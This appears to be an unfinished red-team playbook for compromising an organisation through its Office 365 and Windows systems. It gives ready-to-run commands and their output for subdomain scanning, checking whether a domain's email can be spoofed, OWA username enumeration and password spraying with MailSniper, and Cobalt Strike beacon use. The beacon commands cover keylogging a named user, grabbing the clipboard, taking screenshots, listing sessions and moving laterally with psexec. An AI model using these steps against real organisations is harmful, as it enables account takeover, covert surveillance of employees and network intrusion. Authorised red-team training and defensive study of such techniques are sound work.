Google dorking is an incredibly powerful and simple method of finding more information about a target.
Social Media
Social Media is an invaluable resource for finding information. A red team should have accounts on all major social media platforms, LinkedIn premium is a must have. Wise choice to always create a burner for every engagement. Here are some things to find in social media:
Web Servers
$ dig rotta.dev
;; ANSWER SECTION:
rotta.dev. 3600 IN A 76.223.105.230
rotta.dev. 3600 IN A 13.248.243.5
$ whois rotta.dev
OrgName: Amazon.com, Inc.
OrgId: AMAZO-4
Address: Amazon Web Services, Inc.
Address: P.O. Box 81226
City: Seattle
StateProv: WA
PostalCode: 98108-1226
Country: US
RegDate: 2005-09-29
Updated: 2022-09-30
Comment: For details of this service please see
Comment: http://ec2.amazonaws.com
Ref: https://rdap.arin.net/registry/entity/AMAZO-4
$ ~/dnscan$ ./dnscan.py -d rotta.dev -w subdomains-100.txt
[*] Scanning rotta.dev for A records
76.223.105.230 - www.rotta.dev
199.32.90.122 - mail.rotta.dev
(Alteratively, we can use crt.sh or the like to do this. However, DNSscan resolves
IP addresses, which is incredibly powerful to determine if a subdomain is hosted
on a separate / or possibly internal server.)
Email Security
Weak email security (SPF, DMARC and DKIM) may allow us to spoof emails to appear as though they’re coming from their own domain.
$ ~/Spoofy$ pip3 install -r requirements.txt
$ ~/Spoofy$ python3 spoofy.py -d rotta.dev -o stdout
[*] Domain: rotta.dev
[*] Is subdomain: False
[*] DNS Server: 1.1.1.1
[?] No SPF record found.
[?] No DMARC record found.
[+] Spoofing possible for rotta.dev
Office 365
People
(TODO Include Mindmap screenshot here or organization).
Initial Compromise
OWA Password Spraying
Far from the best method of gaining access these days. All eyes are you from the SOC when performing these attacks. That said, password spraying incidents cause massive bloat in alerts for blue team. Some orgs may decide to exclude this activity entirely as they have measures in place to mitigate activity. Account lockouts, Conditional Access Policy (CAP), etc.
Generate username wordlist
There are many wordlist generators out there for usernames. Will not name them.
$ ~/namemash.py users.txt > usernames.txt
Determine valid domain
PS C:\Users\PaulBlart\> ipmo C:\Tools\MailSniper\MailSniper.ps1
PS C:\Users\PaulBlart> Invoke-DomainHarvestOWA -ExchHostname mail.rotta.dev
[*] Harvesting domain name from the server at mail.rotta.dev
The domain appears to be: CYBER or rotta.dev
Find Valid Usernames Password
Authentications on valid usernames take a little longer to process then invalid usernames, from this we can determine if a username in our wordlist is valid or is invalid.
PS C:\Users\PaulBlart> Invoke-UsernameHarvestOWA -ExchHostname mail.rotta.dev -Domain rotta.dev -UserList .\Desktop\usernames.txt
-OutFile .\Desktop\valid_usernames.txt
[*] Now spraying the OWA portal at https://199.32.90.122/owa/
Spray Passwords
If we decide to do this attack, it's best to take our time with this (depending on engagement timeframe). We are unable as red-teamers to determine account lockout configurations without access to the domain.
Post Compromise - Enumeration & Reconnaissance
Harvested O365 Credentials
Download Global Address List
Download global email address list with MailSniper.
beacon> keylogger
[+] received keystrokes from *Untitled - Notepad by nancy
beacon> jobs
[*] Jobs
JID PID Description
--- --- -----------
1 0 keystroke logger
beacon> jobkill 1
Screenshots
printscreen Take a single screenshot via PrintScr method
screenshot Take a single screenshot
screenwatch Take periodic screenshots of desktop
Clipboard
beacon> clipboard
User Sessions
beacon> net logons
Logged on users at \\localhost:
DEV\nancy
DEV\cassy
DEV\PWNBOX$
Windows Registries
Tasks
Processes
Hunting for COM Hijacking
Post Compromise - Host Privilege Escalation
TODO Add this
Windows Services
Post Compromise - Persistence
Persistence - SharPersist & Cobalt Strike
Task Scheduler
AutoRun Registry
Post Compromise - Elevated SYSTEM Persistence
TODO Add this
Windows Services
Post Compromise - Credential Theft
Lateral Movement
Cobalt Strike provides three strategies for executing Beacons/code/commands on remote targets. Most lateral movement techniques leverage legitimate Windows management functionality, as this type of traffic and activity is not unusual to see on a network.
Cobalt Strike Commands
jump
beacon> jump
remote-exec
The user remote-exec you need to connect to P2P Beacons manually using connect or link.
beacon> remote-exec
execute-assembly
This is entirely custom. Custom methods can be integrated into the jump and remote-exec commands using Aggressor.
[+] established link to child beacon: 10.10.122.30
PsExec
The PsExec commands upload a service binary to the target system, then creates and starts a Windos service to execute the binary. Beacons spawned this way run as SYSTEM.
Copies Binary to target:
beacon> jump psexec64 web.rotta.lab smb
[+] established link to child beacon: 10.10.122.30
Doesn't copy binary but runs Powershell
beacon> jump psexec_psh web smb
[+] established link to child beacon: 10.10.122.30